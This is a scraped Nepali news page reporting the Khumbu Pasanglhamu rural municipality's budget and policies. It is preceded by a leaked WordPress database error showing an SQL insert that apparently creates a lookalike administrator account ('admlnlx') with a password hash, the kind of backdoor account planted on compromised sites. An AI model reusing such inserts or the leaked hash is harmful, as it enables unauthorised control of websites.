WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BY8frSJtEqzcw.abkPYkPDoQZiJa5R/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-24 04:09:20', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, ११ असार, सोलुखुम्बु । खुम्बुपासाङल्हामु गाउँपलिकाले रु५८ करोड ८७ लाख ८७ हजार ६ सय ७७ को बजेट ल्याएको छ ।
मंगलबार सम्पन्न चौथो गाउँसभामा जिम्मेवारी सरेर आउने ८ करोड ८१ लाख ५ हजार, केन्द्र सरकारको सर्शत अनुदान ७ करोड ३२ लाख, निर्शत अनुदान ८ कारोड २७ लाख अनुमानीत पेश गरिएको हो ।
केन्द्र सरकाको राजस्व बाडफाडाँ बाट ५ करोड ९४ लाख प्राप्त हुने प्रक्षेपण गरिएको छ । पर्वतारोहण रोयल्टी बाट ९ करोड ७१ लाख ४३ हजार ७ सय ८९, संरक्षित बन क्षत्रेबाट ३ करोड २१ लाख ३५ हजार ८ सय ८८ लाई पनि आम्दानि मानिएको छ ।
आन्तरिक कोष तर्फ १५ करोड ३७ लाख प्राप्त हुने अनुमान गरिएको छ भने प्रदेश सरकारको निर्शत अनुदान ६३ लाख ३ हजार आम्दानी हुने उल्लेख गरिएको छ । वडा स्तरमा १ करोड ५० लाख र गाउँपालिका स्तरमा १५ करोड १३ लाख ८७ हजार ६ सय ७७ सहित गाउँपालिकाको चालु खर्च १६ करोड ६३ लाख ८७ हजार ६ सय ७७ हुने अनुमान गरिएको छ ।
पुजिगत तर्फ वडा स्तरीय ९ करोड गाउँपालिका स्तरीय ३३ करोड ३४ लाख गरि जम्मा ४२ करोड २४ लाख खर्च हुने विवरण प्रस्तुत गरिएको छ ।
गाउँसभामा पेशभएनुसार भौतिक पूर्वाधार तर्फ तेन्जिङ हिलारी विमास्थलको स्तर उन्नतिको पहल गरिने, गाउँपालिकामा केबलकार निर्माणको लागि अध्ययन भइरहेको कार्यलाई निरन्तरता दिने र पैदल यात्राको निर्मणमा पहल गरिने नीति तथा कार्यक्रममा समावेश गरिएको छ ।
खरिखोला देखि गाउँपालिका केन्द्र सम्म सडक ट्राक खोलि स्तर उन्नति गरिने । रिखोलामा बस पार्क निर्माण गरिने, गाउँपालिकामा इलेक्ट्रोनिक सवारी साधनलाई मात्र प्रवेश दिइने समेत नीति तथा कार्यक्रममा उल्लेख गरिएको छ । यसका साथै मालबाहक सवारी साधनको हकमा भने गाउँपालिकाले छुट्टै व्यवस्था गर्ने जनाएको छ । गाउँपालिकाको वडा नम्बर २ र ३ मा जग्गा खरिद गरि पार्किङ स्थल निर्माण गरिने पनि जनाइएको छ ।
सामाजिक सुरक्षा भत्ता पाउनेलाई न्यानो लुगा वितरण देखि कृषिक र पशुपालनमा लागेकालाई प्रात्साहान भत्ताको व्यवस्था पनि गरिने जनाइएको छ । त्यस्तै प्रतेक वडामा कृषि प्राविधिक नर्स र ल्याव टेग्नीसियनको व्यस्था गरिने पनि गाउँपाकिालको नीति तथा कार्यक्रममा समेटिएको छ ।
महेन्द्र ज्योति माध्यामिक विद्यालयमा स्नातक तह अध्यापनको व्यवस्था गर्न पहल गर्ने, पर्यटन वर्ष २०२० लाई सफल पार्न केन्द्र सरकारसँग समन्वय गरि लागि पर्ने, गाउँपालिका भित्र आउने पेय पदार्थमा बोतल नभएर क्यान मात्रै प्रयोग गर्न दिने नीतिमा उल्लेख गरिएको छ । लुक्ला देखि सगरमाथा आधारशिविरसम्म शौचालयको व्यवस्था मिलाउने लागायतका कार्यक्रम समेत गाउँपालिकाले सार्वजनिक गरेको छ ।
https://gaulenews.com/?p=46797
https://gaulenews.com/?p=46752